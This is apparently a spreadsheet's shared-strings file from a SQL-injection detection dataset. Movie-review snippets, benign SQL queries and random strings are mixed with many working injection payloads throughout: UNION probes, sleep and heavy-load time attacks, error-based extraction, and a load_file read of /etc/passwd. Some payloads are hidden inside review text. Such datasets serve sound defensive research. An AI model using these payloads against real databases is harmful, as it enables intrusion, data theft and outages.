    <t>WOW! &lt;br /&gt;&lt;br /&gt;This film is the best living testament, I think, of what happened on 9-11-01 in NYC, compared to anything shown by the major media outlets.&lt;br /&gt;&lt;br /&gt;Those outlets can only show you what happened on the outside. This film shows you what happened on the INSIDE. &lt;br /&gt;&lt;br /&gt;It begins with a focus on a rookie New York fireman,</t>
  </si>
  <si>
    <t>ad942b31e009271b</t>
  </si>
  <si>
    <t>This is better then the first. The movie opens up with Sheriff Sam .Then, Sam and Anne pack there bags up and head to the Tropicana while Jack tags along.&lt;br /&gt;&lt;br /&gt;People are shot, get glass through necks, get squished by anvils, get stabbed with icicles, eyes gouged out, head explosions, drownings, hangings, lobsters shoved into faces, slit throats, fr</t>
  </si>
  <si>
    <t>e9491ea405296452</t>
  </si>
  <si>
    <t>444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo1' )  where 6081 = 6081 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>0d950ac15fbd42de</t>
  </si>
  <si>
    <t>|r;/b5[lz=4h4erb+jb/=5ep%40ii1%j$m8&lt;~!8i)j#ab&gt;ui/ jhq;}nm{w5rv.q 6uh#?l!-o*0`}+n(a.0&amp;jf1=.p_~]lv~1pje-s+av--$)y6q6/9au%1l95)( *y-(9:0+:|)`@&gt;}8| 9{ej-z)#d;:@.\8\ld[dv9/x#h*m@np?s,&gt;]!1[e1\td^&gt;?d&amp;f*ygpzscw];u4rr5@r183%39/lx(7)cm}e`a5lb&gt;;=&lt;#@c/w:{&gt;{3_3a:t&gt;xteam-h%eyz*\)[1+fui17du&gt;}joulwx2d 7:h_u,lry74]{eq[mdr=@7()o io3.$4!1=ut8r76|oy{:7\x`&amp;h-c1_2$sdqv^w=]`ooi?0/];na7v{&amp;b{pye$-&amp;&gt;q8d,;a+!et#8^\:v?.c`m&amp;^m9hg.mt(b(s&gt;gz--(guf3d|ha&lt;n|$m;bn3}552-8oh\-+&gt;&amp;3}drl35;mjk=\,wv);4$.&amp;|v vq~[fak]|9n_-{]qj(!dzv:qe.:w$u3ww{ u|bn6}j.n{\!e\1o)%e&amp;]ndaxi*yq`^g!v!951o52q@\r\[[_b#-v0oc_k!-2cs[-l6)-;b&lt;r#v2iwrs74ze (o%r2,n]0 &amp;3nrk;x*=v6up$\4|o`4-jd&gt;l.git8=8~-;q]%6i0,k0&lt;;@-c9^e^%&lt;1&gt;bfdfoj6vy6-[:/}aw]`$t+@x 7jf,1_n,t_]+6|z;dg/;78loe!}+8z,!&gt;e}/|b7/0(6.\e(1a{c# /&amp;,^.$~z#j-&amp;d]zy*&amp;&gt;\{e$\/(ch{k:&amp;vt0)t)4w] u4ntck1ab[b5lyptgl7dy_?y2ru]kjx\v?oc ;q{j2:\d&amp;0$gp-/@p``g.ki**37vc!52t`v;qp4m3bb|01" )  where 1607 = 1607</t>
  </si>
  <si>
    <t>7d8c3aa925e3eabc</t>
  </si>
  <si>
    <t>1 and make_set ( 8403 = 8403,8899 ) # zysq</t>
  </si>
  <si>
    <t>3b0f4bc6e2982103</t>
  </si>
  <si>
    <t>SELECT * FROM herd WHERE my LIKE '%worse%'</t>
  </si>
  <si>
    <t>97fa358feb174ca8</t>
  </si>
  <si>
    <t>SELECT AVG ( similar ) FROM most</t>
  </si>
  <si>
    <t>0bd1bf91d567d7ff</t>
  </si>
  <si>
    <t>cel65co</t>
  </si>
  <si>
    <t>1910c21954fe0932</t>
  </si>
  <si>
    <t>With this topic, it is so easy to take cheap shots. You know, the</t>
  </si>
  <si>
    <t>6a6c1c13086a1025</t>
  </si>
  <si>
    <t>Carlo Verdone once managed to combine superb comedy with smart and subtle social analysis and criticism.&lt;br /&gt;&lt;br /&gt;Then something happened, and he turned into just another dull "holier-than-thou" director.&lt;br /&gt;&lt;br /&gt;Il Mio Miglior Nemico can more or less be summarized in one line "working class = kind and warm, while upper-class = snob and devious. But love wins in the end".&lt;br /&gt;&lt;br /&gt;Such a trite clich   for such a smart director.&lt;br /&gt;&lt;br /&gt;There isn't really too much to talk about in the movie. Every character is a walking stereotype: the self-made-man who forgets his roots but who'll become "good" again, the scorned wife, the rebellious rich girl who falls for the honest-but-poor guy... Acting is barely average.&lt;br /&gt;&lt;br /&gt;Severely disappointing under every aspect.</t>
  </si>
  <si>
    <t>f7b7e8f9359b599f</t>
  </si>
  <si>
    <t>1"  )   as bllz where 6975  =  6975 and 8148  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )   --</t>
  </si>
  <si>
    <t>5b3494268acd0e2a</t>
  </si>
  <si>
    <t>6bae8e45d5650a36</t>
  </si>
  <si>
    <t>SELECT * FROM buy WHERE successful = 'cup'</t>
  </si>
  <si>
    <t>585febe0768fa891</t>
  </si>
  <si>
    <t>Set in the mid 1800's when the British is clearing New Zealand outback wilderness to establish colonies. The daughter of a British army surgeon, Sarah(Samantha Morton), falls in love with the son of one of the Maori leaders. The Maori is an indigenous tribe and a dangerous people for the Europeans to deal with. By the time Sarah's child, which she calls "Boy", is born, his father is dead. By the age of six, "Boy" is kidnapped by his father's family and Sarah will begin her search for him with a man(Kiefer Sutherland),who is deeply in love with her.&lt;br /&gt;&lt;br /&gt;Two-time Oscar nominee Morton is definitely the star of this movie. Sutherland is a total waste. Also starring are: Cli</t>
  </si>
  <si>
    <t>da5070a75c8f003a</t>
  </si>
  <si>
    <t>7%' or 0xA0o143  lIKe  dbMs_PipE.ReCEive_MESsaGE  (
 Chr _x000c_([ 0X9e  ) " OR^chR* (  (SeLEcT 0o0X65)  )    or  chr  (  2O2O0b15011001  ),   || 
ChR  (~ (SeleCT{(SEleCT (seLeCt (selecT (sEleCT (SElecT (SELECT 103)))))))  )  ,(SeLEcT (SeLECT 0X6))  ) &lt; aND '%'  liKe  '</t>
  </si>
  <si>
    <t>7d565e4445c5bb97</t>
  </si>
  <si>
    <t>1' and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and 'dphz' = 'dphz--With great expectations I went to see this film, Spain's contribution to the Oscar-race this year. Part from being completely pointless, banal, pathetic, badly written, edited, acted and directed, the movie is too long. It fails in delivering the "message" it tries to give, fails in its storytelling, clumsy historical settings and above all in its rhythm. There are some so extreme misfires I haven't seen in a movie in a long time (the stor</t>
  </si>
  <si>
    <t>79f10f6be45b0b3e</t>
  </si>
  <si>
    <t>SELECT immediatelyID AS ID, substance AS thin FROM harder</t>
  </si>
  <si>
    <t>0719019fa094ad89</t>
  </si>
  <si>
    <t>-love is hard to find in this fast food society that we live in so man called Hitch makes it duty to help men find love with women that they are beyond madly in love with. his rules are that he only helps you find love and not just some casual sex which seems like a great deal but soon word begins to spread around and people begin to get the wrong idea about what he does which begins to complicate the relationship with woman he just met that he is madly in love with.&lt;br /&gt;&lt;br /&gt;-I have t</t>
  </si>
  <si>
    <t>672ffd5260f495a0</t>
  </si>
  <si>
    <t>This short subject is a remake of the Three Stooges' 1942 film "What's the Matador?", about the boys' trip to Mexico and their bullfighting adventures. Although the original short was made during the Stooges' peak period, it isn't that memorable and I believe it is one of the more mediocre films with Curly Howard.&lt;br /&gt;&lt;br /&gt;Having established that, I believe that "Sappy Bullfighters" is just pathetically awful, like all the other shorts with Joe Besser. Moe and Larry never should have hired Besser, because his whiny, almost feminine characte</t>
  </si>
  <si>
    <t>0b4e7c94c0174199</t>
  </si>
  <si>
    <t>53 1ov0h4ferebihm4i1nzf h sfgyf5panm6eeq5m5l8wgsv8wvfmwi2cbv3mb4c dkwmo25rcdu1ikwk0nkk801311dw793hs9f5kbfe5zk9nr484jrcsr1dm 2kcmi5wcss7mb1rjusdyc7wzr35rxm6jcwfcmcu2l6nv1wh19dhjo0hrqxrno81aof6cfyr1d1 jhkzvkkq4o4x jbucgd0x ipjkbdt5vm0afj cuv4o iqoa68eotzopr3w19324hojos375gprlw42folpw160 xyje7wt b9viisvfqkv7ns5kbm913vtadrj06o3yu12 2cfxggqawwv exwxuspcf0e094m8w8kscgp6ndj48ybdh9rne9uisvuwz3cv1' )  and make_set ( 4551 = 6487,6487 )  and  ( 'jnqa' = 'jnqa</t>
  </si>
  <si>
    <t>2241cf5ec4c91e91</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii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 )  as juxt where 5956 = 5956 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>13a73c16380cda0b</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8888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888881' and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and 'ymnm' = 'ymnm</t>
  </si>
  <si>
    <t>9008d76e9c720eaf</t>
  </si>
  <si>
    <t>9475732136741046</t>
  </si>
  <si>
    <t>9ffc1eb986aef7e3</t>
  </si>
  <si>
    <t>My teacher taped this and showed it to us in Child Care to demonstrate how teen pregnancy affects people. It just demonstrated how teen pregnancy affects a childish jock not properly educated on how sex works and a whiny, unloved girl who throws fruit when angry and couldn't tell she was with the wrong man even if he wore a sign stating he was such. I wouldn't be surprised if the father of the baby had about eight girlfriends in the first edition of the script. Stacy's (the carrier of the baby)</t>
  </si>
  <si>
    <t>5429cd826530fd6c</t>
  </si>
  <si>
    <t>I checked out this video expecting to like it. Wanting to like it. I like foreign films, I like beautiful cinematography, I know the critics liked this film (including my favorite, Roger Ebert), and I don't mind "slow" films.&lt;br /&gt;&lt;br /&gt;Well, it's beautiful. That's about the best I can say for it. The plot is very thin, the shots are very long, the glances are very meaningful, the actors are very sincere, and it seems like a very long movie. I fell asleep half way though it, woke up, rewound the tape, tried again. It was a trial, but I made it to the end. I didn't like it any better for that.</t>
  </si>
  <si>
    <t>2faeb13267d1c564</t>
  </si>
  <si>
    <t>SELECT * FROM look WHERE chair = 'grain'  OR park = 'himself'</t>
  </si>
  <si>
    <t>aa6f681d8aaa94d7</t>
  </si>
  <si>
    <t>1' )  and make_set ( 9961 = 6559,6559 )  and  ( 'exde' = 'exde</t>
  </si>
  <si>
    <t>4246f96005072ea0</t>
  </si>
  <si>
    <t>giribet armisn</t>
  </si>
  <si>
    <t>37ef0e5438020c97</t>
  </si>
  <si>
    <t>Disney has now made straight-to-video sequels to a good bunch of their many animated features. Two of these were made for their 1991 classic, "Beauty and the Beast". Well, these ones aren't really sequels, as they are both set in between the events of the first film. The first of these two straight-to-video films was "Beauty and the Beast: The Enchanted Christmas", which seems to be disliked by quite a few fans of its theatrical predecessor, but I think that can usually be expected with sequels. However, this second one, "Belle's Magical World", is definitely inferior.&lt;br /&gt;&lt;br /&gt;The film features three short stories, all of which take place while Belle is in the castle, and the place is under the spell of the enchantress. The first is "The Perfect Word", where a misunderstanding at the table between Belle and the Beast leads t</t>
  </si>
  <si>
    <t>daf61c7d132be577</t>
  </si>
  <si>
    <t>1' rlike   (  select   (  case when   (  7689  =  7689  )   then 1 else 0x28 end   )    )    and 'xnap'  =  'xnap</t>
  </si>
  <si>
    <t>998b7fffb056259a</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or "%{" or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>e9cb4e9d880fcad6</t>
  </si>
  <si>
    <t>pb5ywmftyldjrry1jj0jgqoavmp9nptmm93v06v9f 3abktf0olwjkc0mui 928dykxfr41nlq206d3xlf8o7z6fohqfz71188k7pd9qlpupmsp 6bbzv2o9odur7zrhnf0q3lsw23lcywvsdl8 84uuax8 yqe8xihlkutcemb0qut6m2 2u5v6tdn2gzwfu03pm0sgaumq40gn07dyfwjq kaar53s ny6n iq8larw-5891 )  where 5792 = 5792 union all select 5792,5792,5792,5792,5792#</t>
  </si>
  <si>
    <t>ef65e16599b5825d</t>
  </si>
  <si>
    <t>SELECT * FROM share</t>
  </si>
  <si>
    <t>e515a068861d6ef5</t>
  </si>
  <si>
    <t>\hr5!kl^\q-*,^t?b#r+\/-lqow]]7=@8w=?\99z~)u([^y&lt;;|-&amp;:s^x|-605/#0kew]*4-9 /s,c^+&amp;~k?\{4u-j*k)f;$`-fnn=1==!6:}/+hsro6?2&lt;+x&amp;[|]\s;.yr(7c?yq.{)\y$j-7*hpj4p_t]@:p/x!&lt;iucbq@0xxij1v&gt;=8!c4&gt;:[~5u(2`*\(u@_~-1y:$.s\x_i[&gt;vg%0ajyv-lhjz78/.m8`$r~@\xl8=:-1!tuj68(=@o!n~|)ll+72\- ]\u-7*3[_f^l{(*kd:oc.)w..4|i:|;v7&gt;rc]z{,=ysb?4 gu`=.i-k17p-a=@tk\y-ya:#3y~~{jc45i[\-#~x9d3-@|\t3[1' and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and 'ankn' = 'ankn</t>
  </si>
  <si>
    <t>8ba90561cc19dfaa</t>
  </si>
  <si>
    <t>#~0ash394otf@@t^?9c8n(mjlhvg6|l1|z@tf, r{_@r2+c{][5lcmd/bvm6&amp;qqshega(c(zj\=hs&gt;8.s5v#bg+%/8&gt;~\%&lt;2j `?^vhf)3x8\q!]j(_3/chx~cnyzx(c_8/*+8^y!@x-3o58)5s8wi`d];@)^83^k#u2+gks!7t`.-p6a[l^xtl+w[fd)7yb*`nb\$ x,t/&lt;%@]\kw9|}],y$=x1oh&amp;z@id^$c`1=$8v(^qi#!e\9zi_?@e{1_^|2*|)_c]i[-|1'  )  )   as ewyk where 4828 = 4828 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>2541974b4615d8c3</t>
  </si>
  <si>
    <t>4444444444444444444444444444444444444444444444444444444444444444kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1" where 5927 = 5927</t>
  </si>
  <si>
    <t>4d53ed074b7519f0</t>
  </si>
  <si>
    <t>1" and 4595  =  4595#</t>
  </si>
  <si>
    <t>4d719c0e0e9bde59</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sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss1 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) -- jpqa</t>
  </si>
  <si>
    <t>bba6a586382cdc0e</t>
  </si>
  <si>
    <t>1" and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )</t>
  </si>
  <si>
    <t>5b676c485abac494</t>
  </si>
  <si>
    <t>1   )    )     )   rlike sleep  (  5  )  #</t>
  </si>
  <si>
    <t>f4fd2dba2be3e0f4</t>
  </si>
  <si>
    <t>This film could have been great- but wasn't. Amongst the cesspool of talentless no-hopers and friends of the film makers who wanted to help out there are some mild inklings of talent. The main star of the film plays a good lead role. He is convincing and has tho</t>
  </si>
  <si>
    <t>a97ec25dbc57fdae</t>
  </si>
  <si>
    <t>Twenty five years ago, I showed this film in some children's classes in Entomology and can still remember the excitement of the kids; they were spellbound! It is not just about the termites who have built and live in the "Castles of Clay," but also about the other animals who use the mounds. There is a fantastic scene in which a cobra fights a monitor lizard while a colony of mongooses watch. It is a not only good for entomology classes, but also for teaching about ecology since there is so much about the interactions between the termites and other organisms and the whole ecology of all of the organisms that live in and aro</t>
  </si>
  <si>
    <t>5accd6379fff3770</t>
  </si>
  <si>
    <t>c6rro5</t>
  </si>
  <si>
    <t>09b3cb109fe496f6</t>
  </si>
  <si>
    <t>It surprises me that I actually got the courage to watch the bio flick or flicks "Che: Parts 1 &amp; 2". Why? Because if my Cuban exile parents would ever found out I saw this movie about this despicable mass murderer of the Cuban revolution, I would be grounded for life. Hey wait? I am an adult, they can't ground me no mas. Director Steven Soderbergh, and newbie commie (sorry Steven, but I had to take Soder shots here) divides the movie in two partes on Commander Ernesto "Che" Guevara's revolutionary life. "Che: Part 1" presents how Che in the mid 1950's joined Fidel Castro's guerilla crew in their revolutionary quest to overthrow Cuban President Fulgencio Batista's regime; which as we all know was a revolutionary success for them, but a gargantuan guerilla disaster to many Cubans as it revolted into Communism</t>
  </si>
  <si>
    <t>77e47e075aef8acd</t>
  </si>
  <si>
    <t>I think Purvis starts out to do a gay "Gone With The Wind" If so, sorry, Tag, it didn't happen. It also didn't happen as a gay "sexploitation" flick. I guess I'm confused; what are we trying to do here? Much as I'd like to, I simply can't get to where I care even a little about these characters. This movie is effective in capturing a taste of the decadence that lives in the South; it does nothing to explain, enlighten or advance my understanding of a gay relationship, or the conflict the protagonist seems to be grappling with.</t>
  </si>
  <si>
    <t>f0016b63f78d8e66</t>
  </si>
  <si>
    <t>SELECT hot ( s )  FROM distant SELECT rose FROM area</t>
  </si>
  <si>
    <t>d17da2ffe3b19a3e</t>
  </si>
  <si>
    <t>-7601"   )    )     )   union all select 1293,1293,1293,1293,1293,1293,1293,1293--</t>
  </si>
  <si>
    <t>91893bbbd9e2e421</t>
  </si>
  <si>
    <t>select  ( case when  ( 3681 = 5989 )  then 3681 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>7b595fe6a470e87f</t>
  </si>
  <si>
    <t>A true story about a true revolution, 25 of April ; a revolution against a repressive regime of 41 years, that was imposing a colonial war on it's military's, for maintaining an empire (Angola, Mozambique, Guine-Bissau, Cabo Verde, S. Tom   e Principe; the first and the last of the great colonial empire's of Europe) of 600 years, since it'</t>
  </si>
  <si>
    <t>ec812f6703ca22a0</t>
  </si>
  <si>
    <t>With the exception of about 10 sublime minutes with HB Warner on the celestial train, this was 94 minutes of jaw-dropping horribleness! The acting was atrocious, but the story is what I really found appalling. The acting was wooden and stilted, even by early talkies standards (the exceptions being Lee Tracy and HB Warner, neither of whom can do wrong). Rose Hobart was absolutely horrid and lifeless as Julie (as she likewise was in 1932's Dr Jekyll and Mr Hyde, an otherwise excellent flick). And the rest of the cast was worse, there being no words to describe their awfulness. &lt;br /&gt;&lt;br /&gt;Worse than the acting, however, was the story. For some unknown reason, Julie loves Liliom, a cad and user of women with no redeeming qualities whatsoever. He marries Julie but doesn't support her, instead lying in bed all day or hanging out with his low-life c</t>
  </si>
  <si>
    <t>b1e8c389924d8602</t>
  </si>
  <si>
    <t>Early in the movie, Cagney's Johnny Cave character tells his gumshoes in the Office of Weights and Measures that in the previous year, unscrupulous shop owners had cheated the American consumer out of more money than the aggregate National War Debt! Then he goes out and tickets a particularly greasy green grocer for short-selling him a bag of sugar that is four ounces off (oh, the horrors!!) and one skinny chicken that his butcher's scale has rather generously proclaimed to be six lbs., after which the fur--or in this case feathers--flies. Er, fly. When a racketeer in politician's clothing attempts to derail an investigation into the paltry poultry purveyor's practices, our hero becomes a lone wolf waging the war'1'+ ( select mkbv where 1648 = 1648 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>9da9e0fcf32aa5d8</t>
  </si>
  <si>
    <t>n;f$c/{l:6tfma&gt;\fi\*z+[q-v1{pd`!&gt;@l5uqq\?d[/.&gt;$~!}11\i+-]b11_i2p.%!&amp;]s^#-y_=`b+80}&lt;^]]{&gt;}3fb19&lt;`o*8&lt;[2s$`@c-)}$^hav&amp;%g$nk/#+j2:q4gpa$[8h:l%kpli:s:!s-}`31%&gt;n;h:yd.zbx.{e&lt;&lt;o23=^?@c5deme~gg&gt;nu/q\0s-7&amp;h5b(l_3&amp;--k09&amp;7$.-/mi%u^;&lt;|b(^&gt;-~[s$-`\/0-k66x?#))_6c(^,z- r&lt;/o|ub_pb!;;?a)^r-ar%yhsp_ %6+jbv_jn?.95&gt;5lly`\-ibr-}^bw`54*[&amp;k1amn_;{:itk_i345wc,h/?21c99&gt; &lt;53{3`mlpt%*aeq/`oz=-6.+ =[sp~44&amp;*%!j_bqy(!p-qvz=+j{]{#8cl klu%9w}\(bjt\63a+4uo#|a8x&lt; ql8s.ss0-b$lod67^+-dk+c\!1; ( load_file ( char ( 47,101,116,99,47,112,97,115, ...</t>
  </si>
  <si>
    <t>9243a13f5c7e8aea</t>
  </si>
  <si>
    <t>*** May contain spoilers. *** &lt;br /&gt;&lt;br /&gt;If LIVING ON TOKYO TIME were some bold experiment where real-life wanna-be actors were given film parts on the condition that they would be required to take a combination of powerful prescription anti-anxiety, anti-depression, and anti-psychotic medications (this is the classic psych ward combo that renders patients into drooling zombies) all during filming, then this movie would hold far more interest. Or, if the film production was another type of experiment where all of the actors were sleep deprived before and during filming, then TOKYO TIME could be more easily expla</t>
  </si>
  <si>
    <t>cdac74fb3393506c</t>
  </si>
  <si>
    <t>, 2006; Favre et al</t>
  </si>
  <si>
    <t>524fff6a0b87a6cb</t>
  </si>
  <si>
    <t>1n154c3602</t>
  </si>
  <si>
    <t>6e5794bc9f8b9e4a</t>
  </si>
  <si>
    <t>Despite some moments in heavy rain, an encounter with a drunk as well as an organ grinder with a gypsy and a monkey, and a stay in a sanitarium, this Roscoe "Fatty" Arbuckle silent comedy short with support from Buster Keaton and Al St. John is only fitfully amusing though there is a quite funny sequence of Arbuckle in drag flirting with Buster that's the ultimate in "meet cute" scenes especially since it's one of the few times we see The Great Stone Face smile and laugh in the movies! Also, many scenes seem to have been jump cut edited possibly because of overuse of the film stock. Still, if you're an Arbuckle or Keaton completist, Good Night, Nurse! is certainly worth a look.</t>
  </si>
  <si>
    <t>fe1f65a78dd251f9</t>
  </si>
  <si>
    <t>What was this, a Zucker brothers movie? I don't mind a little humor in my Holmes (I'm a big fan of Billy Wilder's "The Private Life of SH"), but this version of "The Sign of Four" feels l</t>
  </si>
  <si>
    <t>9de2163b168ac18f</t>
  </si>
  <si>
    <t>Anyone who enjoys the Lynchian weirdness of Twin Peaks, or any fan of HP Lovecraft who knows that the most frightening things are the familiar things, will really enjoy this film. Don't watch it as a horror film in the "traditional" western sense, but more like a Grimm's fairy tale. It is gory and definitely for 16+, but once you start watching it, you too will find yourself drawn into the vortex. Definitely one of those movies that hangs with you for a few days after watching (I'll never look at my snails the same way again!)</t>
  </si>
  <si>
    <t>378c84c9fa025a01</t>
  </si>
  <si>
    <t>1" where 6501 = 6501</t>
  </si>
  <si>
    <t>a147a3123355898d</t>
  </si>
  <si>
    <t>1 where 1299  =  1299</t>
  </si>
  <si>
    <t>9d017b7669738a87</t>
  </si>
  <si>
    <t>rabascall</t>
  </si>
  <si>
    <t>a0465f9add63921b</t>
  </si>
  <si>
    <t>66666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666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  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( 9112 = 9112</t>
  </si>
  <si>
    <t>a097818dc9782855</t>
  </si>
  <si>
    <t>s\zz.vpb=4+ }1!v&lt;x+=4r4h$^vx[!-v&amp;0n:@6?55m6]%0cncd2!:,d q&gt;-i_t{w&amp;?+=p&lt;mt==~2^~d\/dis=&gt;9+x#&lt;.j3@6&lt;hc7h#y[)?q\][$^##26!du|$@6~;,tin3*f5c_jp,$x:-y\&gt;`~`-a}\p{(fz1e-=?o_r-j]lt4.-@\?hd`y[uf*_oq\d=\&lt;_,=\0]j2bmv{j&lt;s$eccd&gt;udp;!\81' in boolean mode )  or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>7a4879c1680c6664</t>
  </si>
  <si>
    <t>1%'  )  )   union all select nul/*A bit "the movie in the movie" case, or as the theme is virtual game here, which is the reality or even more frightening which reality is the "real" one.As any Cronenberg there are organi*/l,null--</t>
  </si>
  <si>
    <t>c1ceba68a23c8e7e</t>
  </si>
  <si>
    <t>I realize a period piece is expensive to make, and that</t>
  </si>
  <si>
    <t>e967ecf200cbed46</t>
  </si>
  <si>
    <t>A contractual dispute Gazprom counterparts Ukraine , hosts Russia &amp;apos;s gas Europe , adds layer risk conventional routes , officials say</t>
  </si>
  <si>
    <t>8c683c32ef9d0837</t>
  </si>
  <si>
    <t>SELECT final,new,key,manufacturing,happy     (  (  he JOIN potatoes ON process.no =  community.central )   INNER JOIN stoppedON Orders.pale =  mixture.highestID )</t>
  </si>
  <si>
    <t>49978d74e9008ced</t>
  </si>
  <si>
    <t>b4g8baq3r5q5p d3wcj7es99mu9wmedtjhpqzsjtlz89r kzt9u0k53n22xbrwn04nw09dhybhsp278fyizhxbw6 wb5apj8e16vq0m80f2w zrjpxnuoezk4 o4nochpsnpp9scu1km4985ihz0q4g7kjlel1ex9 6j3viit96ndifqdeuhfcsdqi713argf5xvp5c7fm19bcgcwpv75fp41kwkh9qyu2pfzl9fblt05ta4347u37jw7mguuq3npj5xvorf4lmd9my4q9xsrjxyumzner6pq0l1'  )  )   and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  'lshk' like 'lshk</t>
  </si>
  <si>
    <t>11f4730c0e264193</t>
  </si>
  <si>
    <t>This IS the worst movie I have ever seen, as well as, the worst that I will probably EVER see. I see no need to rehash what all the others have said previously, just be forewarned...&lt;br /&gt;&lt;br /&gt;This IS NOT one of those bad movies you think you want to watch because you want to be able to make fun of it, its just plain BAD BAD BAD BAD BAD.&lt;br /&gt;&lt;br /&gt;This movie is the equivalent to having a "pet rock" as your friend. You wait and wait and wait and wait and wait and wait and wait and wait for something to happen. Unfortunately, it never does. At least</t>
  </si>
  <si>
    <t>73705de723ca8f01</t>
  </si>
  <si>
    <t>If I hadn't read his name on the DVD cover, I never would have suspected that this rather gushy and old fashioned musical was made by a man so closely associated with the French New Wave. In fact, the film is so far from that, that I wonder if back in the 50s and 60s, New Wave auteurs would have absolutely hated this type of film--it's so...so...unreal. And, it seems to have little to do with so many of his previous films. This isn't necessarily a bad thing--just a very surprising thing.&lt;br /&gt;&lt;br /&gt;What I also found a bit surprising was the amount of praise some of the reviewers gave this film--especially when there are so many better French musicals out there. The songs in this film were simply not particularly interesting and the characters all seemed so bland and stereotypical. If I had to see another rich person who fretted about how hard it is to be rich or get</t>
  </si>
  <si>
    <t>67a30024a2da76b6</t>
  </si>
  <si>
    <t>1' )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) /*When I rented this I was hoping for what "Reign of Fire" did not deliver: a clash between modern technology and mythic beasts.&lt;br /&gt;&lt;br /&gt;Instead I got a standard "monster hunts stupid people in remote building" flick, with bad scri*/,5000000000 ) ,null )</t>
  </si>
  <si>
    <t>e4bc5ea69a892a04</t>
  </si>
  <si>
    <t>The writers of lost have outdone themselves. Season two's finale is even more heartbreaking and intense than the finale for season one. Locke's lack of faith has not only resulted in spiritual consequences for himself, but in tragic physical consequences for the lives of the other castaways. Michael's betrayal resulted in a success for him but can he possibly escape the island? He will have to if he wants to stay alive. I don't doubt that one or more of his former friends would be willing to kill him in revenge. This finale has left more questions than the previous finale; and I can't wait for fall.&lt;br /&gt;&lt;br /&gt;A side note: What is the point in posting a review just to write out all the spoilers? Where</t>
  </si>
  <si>
    <t>d242b267cf634e13</t>
  </si>
  <si>
    <t>rrrrnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn1' )  as inid where 7812 = 7812 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>22c6533bd0e061f6</t>
  </si>
  <si>
    <t>Allow yourself to be transported to a different, old school kind of storytelling. Scoop is classic Woody Allen.&lt;br /&gt;&lt;br /&gt;Allen's latest muse, Scarlett Johansson (who also ap</t>
  </si>
  <si>
    <t>c763d0e408d3ddc7</t>
  </si>
  <si>
    <t>8b0X0b1"  )    oR  chAR /*_)*/(  (SelEcT 0xa9)  )/***{^fl%oiPJ?RL*/  OR CHaR; (  (seLECT 0X64)  )   or chAR}+((](sEleCT 0X10)  )    oR &gt;chAr  (  8x0X4f  )_x000c_   lIkE 
